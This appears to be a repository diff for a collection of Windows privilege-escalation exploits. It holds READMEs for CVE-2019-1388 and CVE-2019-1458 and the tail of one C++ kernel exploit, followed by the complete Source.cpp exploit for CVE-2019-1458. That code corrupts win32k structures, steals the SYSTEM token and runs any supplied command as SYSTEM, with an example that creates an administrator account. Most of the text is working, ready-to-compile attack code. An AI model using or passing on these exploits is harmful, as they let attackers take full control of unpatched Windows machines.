mov um, ax
}
// If UM is 0x1B, this function is executing in usermode
// code and something went wrong. Therefore output a message that
// the exploit didn't succeed and bail.
if (um == 0x1b)
{
// USER MODE
printf("[!] Exploit didn't succeed, entered sprayCallback with user mode privileges.\r\n");
ExitProcess(-1); // Bail as if this code is hit either the target isn't
// vulnerable or something is wrong with the exploit.
}
else
{
success = TRUE; // Set the success flag to indicate the sprayCallback()
// window procedure is running as SYSTEM.
Shellcode(); // Call the Shellcode() function to perform the token stealing and
// to remove the Job object on the Chrome renderer process.
}
}
return DefWindowProcW(hwnd, msg, wParam, lParam);
}
int main()
{
/* Creating the menu */
for (int i = 0; i < 3; i++)
hMenuList[i] = CreateMenu();
/* Appending the menus along with the item */
for (int i = 0; i < 3; i++)
{
AppendMenuA(hMenuList[i], MF_POPUP | MF_MOUSESELECT, (UINT_PTR)hMenuList[i + 1], "item");
}
AppendMenuA(hMenuList[2], MF_POPUP | MF_MOUSESELECT, (UINT_PTR)0, "item");
/* Creating a main window class */
xxRegisterWindowClassW(L"WNDCLASSMAIN", 0x000, DefWindowProc);
hWindowMain = xxCreateWindowExW(L"WNDCLASSMAIN",
WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST,
WS_VISIBLE,
GetModuleHandleA(NULL));
printf("Handle of the mainWindow : 0x%08X\n", (unsigned int)hWindowMain);
ShowWindow(hWindowMain, SW_SHOWNOACTIVATE);
/* Creating the hunt window class */
xxRegisterWindowClassW(L"WNDCLASSHUNT", 0x000, xxMainWindowProc);
hWindowHunt = xxCreateWindowExW(L"WNDCLASSHUNT",
WS_EX_LEFT,
WS_OVERLAPPEDWINDOW,
GetModuleHandleA(NULL));
printf("Handle of the huntWindow : 0x%08X\n", (unsigned int)hWindowHunt);
/* Hooking the WH_CALLWNDPROC function */
SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc, GetModuleHandleA(NULL), GetCurrentThreadId());
/* Hooking the trackpopupmenuEx WINAPI call */
HWINEVENTHOOK hEventHook = SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, GetModuleHandleA(NULL), xxWindowEventProc,
GetCurrentProcessId(), GetCurrentThreadId(), 0);
/* Setting the root popup menu to null */
printf("Setting the root popup menu to null\n");
release = 0;
TrackPopupMenuEx(hMenuList[0], 0, 0, 0, hWindowMain, NULL);
/* Allocating the memory at NULL page */
*(FARPROC *)&NtAllocateVirtualMemory = GetProcAddress(GetModuleHandleW(L"ntdll"), "NtAllocateVirtualMemory");
if (NtAllocateVirtualMemory == NULL)
return 1;
if (!NT_SUCCESS(NtAllocateVirtualMemory(NtCurrentProcess(),
&MemAddr,
0,
&MemSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE)) || MemAddr != NULL)
{
std::cout << "[-]Memory alloc failed!" << std::endl;
return 1;
}
ZeroMemory(MemAddr, MemSize);
/* Getting the tagWND of the hWindowHunt */
PTHRDESKHEAD head = (PTHRDESKHEAD)xxHMValidateHandle(hWindowHunt);
printf("Address of the win32k!tagWND of hWindowHunt : 0x%08X\n", (unsigned int)head->deskhead.pSelf);
/* Creating a fake POPUPMENU structure */
DWORD dwPopupFake[0x100] = { 0 };
dwPopupFake[0x0] = (DWORD)0x1; //->flags
dwPopupFake[0x1] = (DWORD)0x1; //->spwndNotify
dwPopupFake[0x2] = (DWORD)0x1; //->spwndPopupMenu
dwPopupFake[0x3] = (DWORD)0x1; //->spwndNextPopup
dwPopupFake[0x4] = (DWORD)0x1; //->spwndPrevPopup
dwPopupFake[0x5] = (DWORD)0x1; //->spmenu
dwPopupFake[0x6] = (DWORD)0x1; //->spmenuAlternate
dwPopupFake[0x7] = (ULONG)head->deskhead.pSelf + 0x12; //->spwndActivePopup
dwPopupFake[0x8] = (DWORD)0x1; //->ppopupmenuRoot
dwPopupFake[0x9] = (DWORD)0x1; //->ppmDelayedFree
dwPopupFake[0xA] = (DWORD)0x1; //->posSelectedItem
dwPopupFake[0xB] = (DWORD)0x1; //->posDropped
dwPopupFake[0xC] = (DWORD)0;
/* Copying it to the NULL page */
RtlCopyMemory(MemAddr, dwPopupFake, 0x1000);
/* Allowing to access the NULL page mapped values */
release = 1;
hwndMenuList[2] = NULL;
TrackPopupMenuEx(hMenuList[1], 0, 0, 0, hWindowMain, NULL);
/* Freeing the allocated NULL memory */
VirtualFree(MemAddr, 0x1000, 0);
SendMessageW(hWindowHunt, 0x1234, (WPARAM)hwndMenuList[0], 0x11);
if (success)
{
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
printf("Getting the shell now...\n");
BOOL bRet = CreateProcessA(NULL, (LPSTR)"cmd.exe", NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
if (bRet)
{
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
}
DestroyWindow(hWindowMain);
MSG msg = { 0 };
while (GetMessageW(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessageW(&msg);
}
return 0;
}

BIN
00-CVE_EXP/CVE-2019-1388/HHUPD.EXE Normal file
View File

Binary file not shown.

49
00-CVE_EXP/CVE-2019-1388/README.md Normal file
View File

@ -0,0 +1,49 @@
### CVE-2019-1388
#### 描述
该漏洞位于Windows的UACUser Account Control用户帐户控制机制中。默认情况下Windows会在一个单独的桌面上显示所有的UAC提示——Secure Desktop。这些提示是由名为consent.exe的可执行文件产生的该可执行文件以NT AUTHORITY\SYSTEM权限运行完整性级别为System。因为用户可以与该UI交互因此必须对UI进行严格限制。否则低权限的用户可能可以通过UI操作的循环路由以SYSTEM权限执行操作。即使隔离状态的看似无害的UI特征都可能会成为引发任意控制的动作链的第一步。事实上UAC对话框已被精简仅包含最少的可单击选项。
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86/ARM64 | 1903 | | |
| Windows 10 | x64/x86/ARM64 | 1809 | | |
| Windows 10 | x64/x86/ARM64 | 1803 | | |
| Windows 10 | x64/x86/ARM64 | 1709 | | |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 7 | x64/x86 | | SP1 | &#10004; |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows Server 2008 | x64/x86 | R2 | SP1 | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server | | 1903 | | |
| Windows Server | | 1803 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
```
#### 利用方式
这边直接贴一个GIF图就好了利用文件位置
```
https://github.com/Ascotbe/WindowsKernelExploits/blob/master/CVE-2019-1388/HHUPD.EXE
```
测试系统Windows 7 SP1 x64
![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1388_win7_sp1_x64.gif)
#### 分析文章
- http://blog.leanote.com/post/snowming/38069f423c76
- https://mp.weixin.qq.com/s/q4UICIVwC4HX-ytvWo8Dvw

49
00-CVE_EXP/CVE-2019-1388/README_EN.md Normal file
View File

@ -0,0 +1,49 @@
### CVE-2019-1388
#### Describe
An elevation of privilege vulnerability exists in the Windows Certificate Dialog when it does not properly enforce user privileges, aka 'Windows Certificate Dialog Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86/ARM64 | 1903 | | |
| Windows 10 | x64/x86/ARM64 | 1809 | | |
| Windows 10 | x64/x86/ARM64 | 1803 | | |
| Windows 10 | x64/x86/ARM64 | 1709 | | |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 7 | x64/x86 | | SP1 | &#10004; |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows Server 2008 | x64/x86 | R2 | SP1 | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server | | 1903 | | |
| Windows Server | | 1803 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
```
#### Utilization
It's just a GIF map directly, use the file location.
```
https://github.com/Ascotbe/WindowsKernelExploits/blob/master/CVE-2019-1388/HHUPD.EXE
```
Test system Windows 7 SP1 x64
![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1388_win7_sp1_x64.gif)
#### Analyze
- http://blog.leanote.com/post/snowming/38069f423c76
- https://mp.weixin.qq.com/s/q4UICIVwC4HX-ytvWo8Dvw

47
00-CVE_EXP/CVE-2019-1458/README.md Normal file
View File

@ -0,0 +1,47 @@
### CVE-2019-1458
#### 描述
CVE-2019-1458是Win32k中的特权提升漏洞Win32k组件无法正确处理内存中的对象时导致Windows中存在一个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。然后攻击者可能会安装程序、查看、更改或删除数据或创建具有完全用户权限的新帐户。
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 7 | x64/x86 | | SP1 | &#10004; |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows Server 2008 | x64/x86 | R2 | SP1 | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458
```
#### 利用方式
编译环境
- VS2019V120X64 Release
编译好的文件
```
cve-2019-1458.exe
```
测试系统Windows 7 SP1 x64 直接上GIF图
![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1458_win7_sp1_x64.gif)
#### 分析文章
- https://github.com/piotrflorczyk/cve-2019-1458_POC
- https://bbs.pediy.com/thread-260268.htm
- https://thunderjie.github.io/2020/03/21/CVE-2019-1458-%E4%BB%8E-%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-%E5%88%B0POC%E7%9A%84%E7%BC%96%E5%86%99%E8%BF%87%E7%A8%8B/

48
00-CVE_EXP/CVE-2019-1458/README_EN.md Normal file
View File

@ -0,0 +1,48 @@
### CVE-2019-1458
#### Describe
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 7 | x64/x86 | | SP1 | &#10004; |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows Server 2008 | x64/x86 | R2 | SP1 | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458
```
#### Utilization
CompilerEnvironment
- VS2019V120X64 Release
Compile a good file
```
cve-2019-1458.exe
```
Test system Windows 7 SP1 x64 Direct GIF map
![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1458_win7_sp1_x64.gif)
#### Analyze
- https://github.com/piotrflorczyk/cve-2019-1458_POC
- https://bbs.pediy.com/thread-260268.htm
- https://thunderjie.github.io/2020/03/21/CVE-2019-1458-%E4%BB%8E-%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-%E5%88%B0POC%E7%9A%84%E7%BC%96%E5%86%99%E8%BF%87%E7%A8%8B/

BIN
00-CVE_EXP/CVE-2019-1458/cve-2019-1458.exe Normal file
View File

Binary file not shown.

28
00-CVE_EXP/CVE-2019-1458/cve-2019-1458.sln Normal file
View File

@ -0,0 +1,28 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2019-1458", "cve-2019-1458\cve-2019-1458.vcxproj", "{FD32BB28-7082-41EA-B221-26E8D10A1CC9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Debug|Win32.ActiveCfg = Debug|Win32
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Debug|Win32.Build.0 = Debug|Win32
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Debug|x64.ActiveCfg = Debug|x64
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Debug|x64.Build.0 = Debug|x64
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Release|Win32.ActiveCfg = Release|Win32
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Release|Win32.Build.0 = Release|Win32
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Release|x64.ActiveCfg = Release|x64
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

417
00-CVE_EXP/CVE-2019-1458/cve-2019-1458/Source.cpp Normal file
View File

@ -0,0 +1,417 @@
#include <stdio.h>
#include <windows.h>
#include <VersionHelpers.h>
typedef struct _LARGE_UNICODE_STRING {
ULONG Length;
ULONG MaximumLength : 31;
ULONG bAnsi : 1;
PWSTR Buffer;
} LARGE_UNICODE_STRING, *PLARGE_UNICODE_STRING;
extern "C" NTSTATUS NtUserMessageCall(HANDLE hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);
extern "C" NTSTATUS NtUserDefSetText(HANDLE hWnd, PLARGE_UNICODE_STRING plstr);
extern "C" DWORD g_NtUserDefSetText_syscall = 0x1080, g_NtUserMessageCall_syscall = 0x1009;
#define SPARY_TIMES 0x1000
#ifdef _WIN64
typedef void*(NTAPI *lHMValidateHandle)(HANDLE h, int type);
#else
typedef void*(__fastcall *lHMValidateHandle)(HANDLE h, int type);
#endif
typedef NTSTATUS(__stdcall*RtlGetVersionT)(PRTL_OSVERSIONINFOW lpVersionInformation);
HWND g_hwnd = 0;
ULONG_PTR g_gap = 0;
lHMValidateHandle pHmValidateHandle = NULL;
BOOL FindHMValidateHandle() {
HMODULE hUser32 = LoadLibraryA("user32.dll");
if (hUser32 == NULL) {
printf("Failed to load user32");
return FALSE;
}
BYTE* pIsMenu = (BYTE *)GetProcAddress(hUser32, "IsMenu");
if (pIsMenu == NULL) {
printf("Failed to find location of exported function 'IsMenu' within user32.dll\n");
return FALSE;
}
unsigned int uiHMValidateHandleOffset = 0;
for (unsigned int i = 0; i < 0x1000; i++) {
BYTE* test = pIsMenu + i;
if (*test == 0xE8) {
uiHMValidateHandleOffset = i + 1;
break;
}
}
if (uiHMValidateHandleOffset == 0) {
printf("Failed to find offset of HMValidateHandle from location of 'IsMenu'\n");
return FALSE;
}
unsigned int addr = *(unsigned int *)(pIsMenu + uiHMValidateHandleOffset);
unsigned int offset = ((unsigned int)pIsMenu - (unsigned int)hUser32) + addr;
//The +11 is to skip the padding bytes as on Windows 10 these aren't nops
pHmValidateHandle = (lHMValidateHandle)((ULONG_PTR)hUser32 + offset + 11);
return TRUE;
}
VOID
NTAPI
RtlInitLargeUnicodeString(IN OUT PLARGE_UNICODE_STRING DestinationString,
IN PCWSTR SourceString)
{
ULONG DestSize;
if (SourceString)
{
DestSize = wcslen(SourceString) * sizeof(WCHAR);
DestinationString->Length = DestSize;
DestinationString->MaximumLength = DestSize + sizeof(WCHAR);
}
else
{
DestinationString->Length = 0;
DestinationString->MaximumLength = 0;
}
DestinationString->Buffer = (PWSTR)SourceString;
DestinationString->bAnsi = FALSE;
}
void writedata(ULONG_PTR addr, ULONG_PTR data, ULONG size)
{
SetClassLongPtr(g_hwnd, g_gap, addr);
CHAR input[sizeof(ULONG_PTR)*2];
RtlSecureZeroMemory(&input, sizeof(input));
LARGE_UNICODE_STRING u;
for (int i = 0; i<sizeof(ULONG_PTR); i++)
{
input[i] = (data >> (8 * i)) & 0xff;
}
RtlInitLargeUnicodeString(&u, (PCWSTR)input);
u.Length = size;
u.MaximumLength = size;
NtUserDefSetText(g_hwnd, &u);
}
ULONG_PTR readdata(ULONG_PTR addr)
{
SetClassLongPtr(g_hwnd, g_gap, addr);
ULONG_PTR temp[2] = {0};
InternalGetWindowText(g_hwnd, (LPWSTR)temp, sizeof(temp) - sizeof(WCHAR));
return temp[0];
}
int main()
{
ULONG_PTR off_tagWND_pself = 0x20, off_tagCLS_extra=0xa0, off_tagWND_tagCLS=0x98, off_tagWND_strName=0xe0;
ULONG_PTR off_EPROCESS_Token = 0x348, off_KTHREAD_EPROCESS = 0x220, off_tagWND_parent=0x58, off_tagWND_pti=0x10;
ULONG_PTR off_exp_tagCLS = 0;
int argc = 0;
wchar_t **argv = CommandLineToArgvW(GetCommandLineW(), &argc);
puts("CVE-2019-1458 exploit by @unamer(https://github.com/unamer)");
if (argc != 2)
{
printf("Usage: %S command\nExample: %S \"net user admin admin /ad & net user localgroup administrators admin /ad\"\n\nWARNING: YOU ONLY HAVE ONE CHANCE!!!", argv[0], argv[0]);
return -1;
}
OSVERSIONINFOW osver;
RtlSecureZeroMemory(&osver, sizeof(osver));
osver.dwOSVersionInfoSize = sizeof(osver);
RtlGetVersionT pRtlGetVersion = (RtlGetVersionT)GetProcAddress(GetModuleHandleA("ntdll"), "RtlGetVersion");
pRtlGetVersion(&osver);
if (osver.dwMajorVersion == 6) {
#ifdef _WIN64
if (osver.dwMinorVersion == 0)//win2008
{
off_tagWND_pself = 0x20;
off_tagCLS_extra = 0xa0;
off_tagWND_tagCLS = 0x98;
off_tagWND_strName = 0xe0;
off_KTHREAD_EPROCESS = 0x210;
off_tagWND_parent = 0x58;
off_EPROCESS_Token = 0x208;
off_tagWND_pti = 0x10;
g_NtUserDefSetText_syscall = 0x1081;
g_NtUserMessageCall_syscall = 0x1007;
off_exp_tagCLS = 1; // stupid windows 2008
}
else if (osver.dwMinorVersion==1)
{//win7 / win2008 R2
off_tagWND_pself = 0x20;
off_tagCLS_extra = 0xa0;
off_tagWND_tagCLS = 0x98;
off_tagWND_strName = 0xe0;
off_KTHREAD_EPROCESS = 0x210;
off_tagWND_parent = 0x58;
off_EPROCESS_Token = 0x208;
off_tagWND_pti = 0x10;
g_NtUserDefSetText_syscall = 0x107f;
g_NtUserMessageCall_syscall = 0x1007;
off_exp_tagCLS = 1; // stupid windows 2008
}
else if (osver.dwMinorVersion == 2)
{
// win8/win2012
off_tagWND_pself = 0x20;
off_tagCLS_extra = 0xa0;
off_tagWND_tagCLS = 0x98;
off_tagWND_strName = 0xe0;
off_EPROCESS_Token = 0x348;
off_KTHREAD_EPROCESS = 0x220;
off_tagWND_parent = 0x58;
off_tagWND_pti = 0x10;
g_NtUserDefSetText_syscall = 0x107f;
g_NtUserMessageCall_syscall = 0x1008;
}
else if (osver.dwMinorVersion==3)
{
// win8.1 / win2012 R2
off_tagWND_pself = 0x20;
off_tagCLS_extra=0xa0;
off_tagWND_tagCLS=0x98;
off_tagWND_strName=0xe0;
off_EPROCESS_Token = 0x348;
off_KTHREAD_EPROCESS = 0x220;
off_tagWND_parent=0x58;
off_tagWND_pti=0x10;
g_NtUserDefSetText_syscall = 0x1080;
g_NtUserMessageCall_syscall = 0x1009;
}
else
{
printf("[!] This version of system was not supported (%d.%d)\n", osver.dwMajorVersion, osver.dwMinorVersion);
return -99;
}
#else
// too lazy to support x32 version
if (osver.dwMinorVersion == 0)//win2008
{
}
else
{//win7
}
#endif
}
else
{
printf("[!] This version of system was not supported (%d.%d)\n", osver.dwMajorVersion, osver.dwMinorVersion);
return -99;
}
if (!FindHMValidateHandle()) {
printf("[!] Failed to locate HmValidateHandle, exiting\n");
return 1;
}
ULONG_PTR base_alloc = 0xc00000;
ULONG_PTR target_addr = base_alloc << (8 * off_exp_tagCLS);
ULONG_PTR temp = (ULONG_PTR)VirtualAlloc((LPVOID)target_addr, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (temp != target_addr)
{
printf("[!] Failed to map 0x%p (0x%p), exiting (%llx)\n", target_addr, temp, GetLastError());
return 2;
}
target_addr = (base_alloc + 0x10000) << (8 * off_exp_tagCLS);
temp = (ULONG_PTR)VirtualAlloc((LPVOID)target_addr, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (temp != target_addr)
{
printf("[!] Failed to map 0x%p (0x%p), exiting (%llx)\n", target_addr, temp, GetLastError());
return 2;
}
const wchar_t CLASS_NAME[] = L"unamer";
WNDCLASS wc;
RtlSecureZeroMemory(&wc, sizeof(wc));
HINSTANCE hself = GetModuleHandle(0);
wc.lpfnWndProc = DefWindowProc;
wc.hInstance = hself;
wc.lpszClassName = CLASS_NAME;
wc.cbWndExtra = 0x3000;
wc.cbClsExtra = 0x3000;
RegisterClass(&wc);
HWND hwnd;
ULONG_PTR tagWND = 0, tagCLS = 0;
INT64 gap = 0;
while (true)
{
hwnd = CreateWindowEx(0, CLASS_NAME, L"unamer", 0, 0, 0, 0, 0, NULL, NULL, hself, NULL);
if (hwnd == NULL)
{
printf("[!] CreateWindowEx error 0x%x!\n", GetLastError());
return 3;
}
char* lpUserDesktopHeapWindow = (char*)pHmValidateHandle(hwnd, 1);
tagWND = *(ULONG_PTR*)(lpUserDesktopHeapWindow + off_tagWND_pself);
// ULONG_PTR ulClientDelta = tagWND - (ULONG_PTR)lpUserDesktopHeapWindow;
tagCLS = *(ULONG_PTR*)(lpUserDesktopHeapWindow + off_tagWND_tagCLS);
gap = tagWND - tagCLS;
if (gap>0 && gap<0x100000)
{
break;
}
}
printf("[*] tagWND: 0x%p, tagCLS:0x%p, gap:0x%llx\n", tagWND, tagCLS, gap);
WNDCLASSEX wcx;
RtlSecureZeroMemory(&wcx, sizeof(wcx));
wcx.hInstance = hself;
wcx.cbSize = sizeof(wcx);
wcx.lpszClassName = L"SploitWnd";
wcx.lpfnWndProc = DefWindowProc;
wcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0
printf("[*] Registering window\n");
ATOM wndAtom = RegisterClassEx(&wcx);
if (wndAtom == INVALID_ATOM) {
printf("[-] Failed registering SploitWnd window class\n");
exit(-1);
}
printf("[*] Creating instance of this window\n");
HWND sploitWnd = CreateWindowEx(0, L"SploitWnd", L"", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hself, NULL);
if (sploitWnd == INVALID_HANDLE_VALUE) {
printf("[-] Failed to create SploitWnd window\n");
exit(-1);
}
// ULONG_PTR tagExpWnd = *(ULONG_PTR*)((char*)pHmValidateHandle(sploitWnd, 1) + off_tagWND_pself);
// printf("[*] tagWND: 0x%p, tagCLS: 0x%p,tagExpWnd: 0x%p, gap: 0x%llx\n", tagWND, tagCLS, tagExpWnd, gap);
printf("[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window 0x%p\n", sploitWnd);
NtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1);
printf("[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\n");
SetWindowLongPtr(sploitWnd, 0, tagCLS - off_exp_tagCLS);
printf("[*] GetLastError = %x\n", GetLastError());
printf("[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\n");
HWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L"", 0, 0, 0, 0, 0, NULL, NULL, hself, NULL);
printf("[*] Simulating alt key press\n");
BYTE keyState[256];
GetKeyboardState(keyState);
keyState[VK_MENU] |= 0x80;
SetKeyboardState(keyState);
/* keybd_event(VK_MENU, 0, 0, 0);*/
printf("[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\n");
NtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1);
// now cbCLSExtra is very large
// verify the oob read
ULONG_PTR orig_name = SetClassLongPtr(hwnd, gap - off_tagCLS_extra + off_tagWND_strName, tagWND + off_tagWND_pself);
ULONG_PTR testtagWND[2] = { 0 };
InternalGetWindowText(hwnd, (LPWSTR)testtagWND, sizeof(ULONG_PTR));
if (testtagWND[0] == tagWND)
{
ULONG_PTR tagExpWnd = *(ULONG_PTR*)((char*)pHmValidateHandle(sploitWnd, 1) + off_tagWND_pself);
printf("[*] tagWND: 0x%p\n", tagExpWnd);
printf("[+] Exploit success!\n");
// fix tagCLS
g_hwnd = hwnd;
g_gap = gap - off_tagCLS_extra + off_tagWND_strName;
writedata(tagExpWnd + 0x40, 0,4);
writedata(tagCLS + 0x68, (ULONG_PTR)hself, 8);
writedata(tagCLS + 0x58, (ULONG_PTR)DefWindowProc, 8);
ULONG_PTR token = readdata(readdata(readdata(readdata(readdata(tagWND + off_tagWND_parent) + off_tagWND_pti)) + off_KTHREAD_EPROCESS) + off_EPROCESS_Token);
ULONG_PTR ep = readdata(readdata(readdata(tagWND + off_tagWND_pti)) + off_KTHREAD_EPROCESS); // self EPROCESS
ULONG_PTR temp = readdata(ep + off_EPROCESS_Token + sizeof(ULONG_PTR)); // fix WorkingSetPage
writedata(ep + off_EPROCESS_Token, token, 8);
writedata(ep + off_EPROCESS_Token + sizeof(ULONG_PTR), temp,8);
// fix tagWND
SetClassLongPtr(hwnd, g_gap, orig_name);
DestroyWindow(hwnd);
g_hwnd = 0;
DestroyWindow(sploitWnd);
UnregisterClass(CLASS_NAME, 0);
UnregisterClass(L"SploitWnd", 0);
SECURITY_ATTRIBUTES sa;
HANDLE hRead, hWrite;
byte buf[40960] = { 0 };
STARTUPINFOW si;
PROCESS_INFORMATION pi;
DWORD bytesRead;
RtlSecureZeroMemory(&si, sizeof(si));
RtlSecureZeroMemory(&pi, sizeof(pi));
RtlSecureZeroMemory(&sa, sizeof(sa));
int br = 0;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead, &hWrite, &sa, 0))
{
return -3;
}
wprintf(L"[*] Trying to execute %s as SYSTEM\n", argv[1]);
si.cb = sizeof(STARTUPINFO);
GetStartupInfoW(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.lpDesktop = L"WinSta0\\Default";
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
wchar_t cmd[4096] = { 0 };
lstrcpyW(cmd, argv[1]);
if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
{
CloseHandle(hWrite);
CloseHandle(hRead);
printf("[!] CreateProcessW Failed![%lx]\n", GetLastError());
return -2;
}
CloseHandle(hWrite);
printf("[+] ProcessCreated with pid %d!\n", pi.dwProcessId);
while (1)
{
if (!ReadFile(hRead, buf + br, 4000, &bytesRead, NULL))
break;
br += bytesRead;
}
puts("===============================");
puts((char*)buf);
fflush(stdout);
fflush(stderr);
CloseHandle(hRead);
CloseHandle(pi.hProcess);
ExitProcess(0);
}
else
{
printf("[!] Exploit fail, test:0x%p,tagWND:0x%p, error:0x%lx\n", testtagWND, tagWND, GetLastError());
ExitProcess(-5);
}
}

159
00-CVE_EXP/CVE-2019-1458/cve-2019-1458/cve-2019-1458.vcxproj Normal file
View File

@ -0,0 +1,159 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{FD32BB28-7082-41EA-B221-26E8D10A1CC9}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>cve20191458</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
